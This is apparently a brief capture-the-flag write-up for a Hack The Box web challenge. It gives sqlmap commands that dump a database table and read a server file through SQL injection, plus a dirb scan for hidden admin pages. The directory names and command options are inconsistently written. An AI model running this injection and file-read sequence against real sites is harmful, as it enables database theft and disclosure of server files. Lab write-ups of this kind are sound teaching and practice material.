HTB WEB freelancer

from source code we found portfolio.php?id=3

so lets try sql injection

sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” — tables

we see table called safeadmin

sqlmap -u “http://docker.hackthebox.eu:30596/portfolio.php?id=3” -T safeadmin — dump

will find hash uncrackable

from source we also found /admininstrat

dirb http://docker.hackthebox.eu:30596/administrat/ -X .php

we found the file /panel.php

sqlmap -u “http://docker.hackthebox.eu:30596/administrat/panel.php” — file-read=/var/www/html/administat/panel.php then cat that file

below the page u will find the flag